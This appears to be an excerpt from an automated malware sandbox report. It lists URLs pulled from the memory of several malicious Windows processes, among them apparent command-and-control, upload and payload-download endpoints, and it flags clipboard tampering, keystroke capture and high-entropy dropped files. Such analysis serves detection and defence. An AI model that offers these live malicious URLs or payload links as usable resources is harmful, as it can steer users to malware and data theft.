Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LRjq(
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Responsex
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LRjq
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Responsex
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/#F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/)
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/1F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/2
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/:F
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/DG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/E
Source: 3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/N
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/RG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/S
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/a
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/g
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/iG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/j
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php%qN
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php/qH
Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php0
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php9
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpBJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpG
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpIq
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpM?
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpOq(
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpQq:
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpXJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpj
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpl
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpsrJG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/x
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phposoft
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phpraz
Source: Shipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.dr	String found in binary or memory: https://api.ip.sb/ip
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/browse-and-buy-cs2-skins
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/windows-latest-updates
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRYqOGCv-jevzMWu9XILkZeuC_BAi1BgW9cnKgQP1CVVw&s
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/
Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/1G
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/5
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/G
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413F2CB
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/.)
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/3422
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/7345342
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/se
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003346000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000030F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/fiLr6dSt
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp, 3546345[1].exe.11.dr, channel2[1].exe.11.dr, 3546345.exe.11.dr, Channel1[1].exe.11.dr	String found in binary or memory: https://update-ledger.net/update
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/(e
Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/K
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/Pe
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/S
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/he
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/r
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/rs
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00624632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_00624632

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00624830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

19_2_00624830

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00624632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00610508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

19_2_00610508

Installs a raw input device (often for capturing keystrokes)

Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_f3a5e7a4-8

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0063D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

19_2_0063D164

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp1486.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp14D5.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Entrepreneurs entropy: 7.99797398135	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Greatest entropy: 7.99794017652	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Provides entropy: 7.99760816884	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Competent entropy: 7.99811049854	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Whom entropy: 7.99734780297	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Reveal entropy: 7.99789640851	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Corporate entropy: 7.99704915594	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Screw entropy: 7.99717752647	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Still entropy: 7.9977069634	Jump to dropped file
